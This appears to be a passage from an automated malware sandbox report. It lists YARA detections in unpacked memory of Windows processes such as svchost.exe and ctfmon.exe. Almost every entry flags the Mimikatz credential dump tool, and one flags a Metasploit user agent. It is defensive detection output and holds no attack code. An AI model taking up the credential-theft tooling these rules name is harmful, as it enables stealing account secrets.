      Source: 32.0.ctfmon.exe.750000.3.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 28.0.WUDHostServices.exe.c0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.2.SearchProtocolHost.exe.2fe2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.5.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fd7468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 35.0.svchost.exe.857468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.49.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.792c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.36.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.41.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.2.svchost.exe.4e0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.24.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.14.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e42c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.517468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8e2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.21.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.44.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.29.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.60.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.57b7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.0.WUDHostServices.exe.3e0000.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.31.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.2.wuauclt.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 24.2.dllhost.exe.2e37468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.20.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.997468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
